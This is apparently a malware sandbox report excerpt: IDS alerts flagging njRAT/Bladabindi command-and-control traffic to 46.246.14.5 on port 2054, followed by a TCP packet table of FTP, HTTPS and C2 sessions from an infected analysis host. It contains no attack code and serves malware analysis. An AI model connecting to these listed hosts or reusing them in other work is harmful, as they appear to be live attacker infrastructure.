2024-09-24T23:43:30.027880+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.058638+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.537958+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 24, 2024 23:42:03.633469105 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:03.638364077 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:03.638443947 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:04.252587080 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:04.253403902 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:04.258236885 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:04.474591017 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:04.474827051 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:04.479707003 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:04.705015898 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:04.705259085 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:04.710114956 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:04.925755978 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:04.925973892 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:04.931338072 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.146946907 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.147140980 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:05.151886940 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.369565964 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.369791031 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:05.375293970 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.598150015 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.601114988 CEST	49705	60973	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:05.606034040 CEST	60973	49705	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.606122971 CEST	49705	60973	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:05.606169939 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:05.611268997 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.841496944 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:05.884795904 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:06.241117954 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:06.245980978 CEST	60973	49705	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:06.246448040 CEST	60973	49705	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:06.246529102 CEST	49705	60973	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:06.247313023 CEST	49705	60973	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:06.252091885 CEST	60973	49705	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:06.272394896 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:06.272433043 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:06.272528887 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:06.279454947 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:06.279473066 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:06.290997028 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:06.766532898 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:06.766690969 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:06.771097898 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:06.771106005 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:06.771462917 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:06.800879002 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:06.847409010 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.064575911 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.065390110 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.065469980 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.065493107 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.065514088 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.065581083 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.065834999 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.065937042 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.070286036 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.070328951 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.070363045 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.070374012 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.070389986 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.119138002 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.152430058 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.152585030 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.153331041 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153338909 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153415918 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153424025 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.153455019 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153513908 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.153548002 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.153553963 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153707981 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153769016 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.153776884 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153835058 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.153872967 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153954029 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.153961897 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.153975010 CEST	443	49706	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:07.154014111 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.154050112 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:07.156100988 CEST	49706	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:08.558604956 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:08.563436031 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:08.779620886 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:08.780205965 CEST	49707	60340	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:08.785049915 CEST	60340	49707	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:08.785140991 CEST	49707	60340	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:08.785200119 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:08.790011883 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:09.006505966 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:09.056598902 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:09.400640965 CEST	60340	49707	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:09.400787115 CEST	60340	49707	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:09.400866985 CEST	49707	60340	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:09.400902987 CEST	49707	60340	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:09.401283979 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:09.401838064 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:09.401880980 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:09.402028084 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:09.402282000 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:09.402292967 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:09.406677961 CEST	60340	49707	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:09.447222948 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:09.891869068 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:09.893852949 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:09.893878937 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.278565884 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.279014111 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.279098034 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.279119968 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.279148102 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.279294014 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.280000925 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.280072927 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.283780098 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.283862114 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.367641926 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.367729902 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.367748022 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.367774010 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.367855072 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.367860079 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.368768930 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.368824005 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.368858099 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.368865013 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.368889093 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.368906021 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.368927002 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.368932009 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.368943930 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.456087112 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456134081 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456166029 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.456167936 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456195116 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456229925 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.456729889 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456785917 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456787109 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.456794977 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456846952 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.456855059 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456896067 CEST	443	49708	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:10.456897020 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.456943989 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:10.457201004 CEST	49708	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:12.080056906 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:12.084990025 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:12.301886082 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:12.302304029 CEST	49710	60326	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:12.307535887 CEST	60326	49710	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:12.307641029 CEST	49710	60326	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:12.307770967 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:12.313294888 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:12.532241106 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:12.619153976 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:12.946691990 CEST	21	49704	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:12.949858904 CEST	60326	49710	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:12.950594902 CEST	60326	49710	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:12.950684071 CEST	49710	60326	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:12.953346014 CEST	49710	60326	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:12.953974962 CEST	49711	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:12.954016924 CEST	443	49711	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:12.954093933 CEST	49711	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:12.954849958 CEST	49711	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:12.954865932 CEST	443	49711	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:12.958178997 CEST	60326	49710	191.252.83.213	192.168.2.5
Sep 24, 2024 23:42:13.009807110 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:13.450629950 CEST	443	49711	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:13.465542078 CEST	49711	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:13.465584993 CEST	443	49711	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:13.919424057 CEST	443	49711	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:13.919524908 CEST	443	49711	76.76.21.22	192.168.2.5
Sep 24, 2024 23:42:13.919580936 CEST	49711	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:13.920062065 CEST	49711	443	192.168.2.5	76.76.21.22
Sep 24, 2024 23:42:14.192816019 CEST	49704	21	192.168.2.5	191.252.83.213
Sep 24, 2024 23:42:15.539864063 CEST	49712	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:15.539926052 CEST	443	49712	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:15.540009022 CEST	49712	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:15.545692921 CEST	49712	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:15.545715094 CEST	443	49712	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:16.018513918 CEST	443	49712	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:16.018599033 CEST	49712	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:16.020313025 CEST	49712	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:16.020327091 CEST	443	49712	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:16.020565987 CEST	443	49712	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:16.026165962 CEST	49712	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:16.071399927 CEST	443	49712	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:16.539891958 CEST	443	49712	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:16.540000916 CEST	443	49712	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:16.540061951 CEST	49712	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:16.541660070 CEST	49712	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:24.031769991 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:42:24.036643982 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:42:24.036744118 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:42:24.538050890 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:42:24.542913914 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:42:24.543018103 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:42:24.547873974 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:42:24.800944090 CEST	56146	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:24.800962925 CEST	443	56146	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:24.801044941 CEST	56146	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:24.803309917 CEST	56146	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:24.803322077 CEST	443	56146	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:25.279840946 CEST	443	56146	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:25.279930115 CEST	56146	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:25.281259060 CEST	56146	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:25.281266928 CEST	443	56146	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:25.281706095 CEST	443	56146	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:25.291604042 CEST	56146	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:25.339411974 CEST	443	56146	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:25.430515051 CEST	443	56146	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:25.430603027 CEST	443	56146	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:25.430810928 CEST	56146	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:25.431807995 CEST	56146	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:30.780426025 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:42:30.785229921 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:42:31.694470882 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:42:31.696717978 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:42:31.701565027 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:42:32.858988047 CEST	56147	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:32.859076023 CEST	443	56147	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:32.859159946 CEST	56147	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:32.861761093 CEST	56147	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:32.861788988 CEST	443	56147	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:33.613188982 CEST	443	56147	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:33.613272905 CEST	56147	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:33.617511988 CEST	56147	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:33.617523909 CEST	443	56147	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:33.617916107 CEST	443	56147	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:33.642138004 CEST	56147	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:33.687396049 CEST	443	56147	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:33.769119024 CEST	443	56147	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:33.769284964 CEST	443	56147	104.20.4.235	192.168.2.5
Sep 24, 2024 23:42:33.769335032 CEST	56147	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:33.770221949 CEST	56147	443	192.168.2.5	104.20.4.235
Sep 24, 2024 23:42:49.289657116 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:42:49.290848970 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:42:49.295723915 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:07.351016045 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:07.351552963 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:07.356327057 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:09.694623947 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:09.744151115 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:09.823179960 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:09.828161001 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:13.154256105 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:13.197402000 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:13.222752094 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:13.227555990 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:16.754113913 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:16.806658983 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:16.816363096 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:16.821366072 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:19.964020014 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:20.009721041 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:20.048232079 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:20.053231001 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:20.415585041 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:20.420409918 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:21.823270082 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:21.828053951 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:22.918345928 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:22.955511093 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:22.960407019 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:25.451718092 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:25.452059031 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:25.462601900 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:26.275660992 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:26.280512094 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:26.448004007 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:26.452785969 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:26.998826027 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.033977985 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.038840055 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.447592974 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.452725887 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.572535992 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.577325106 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.874346018 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.879215956 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.879287004 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.884176016 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.884284019 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.889031887 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.890573978 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.895365000 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.895423889 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.900154114 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.900264978 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.905076981 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.905133009 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.909931898 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.909984112 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.914788008 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.917728901 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.922460079 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.922522068 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.927401066 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:27.938040972 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:27.943680048 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.006778955 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.011714935 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.078828096 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.083651066 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.083729029 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.088562965 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.089272022 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.094707966 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.094773054 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.102550030 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.102648020 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.107579947 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.107698917 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.112521887 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.112674952 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.118165016 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.118220091 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.124033928 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.125430107 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.130496979 CEST	2054	56145	46.246.14.5	192.168.2.5
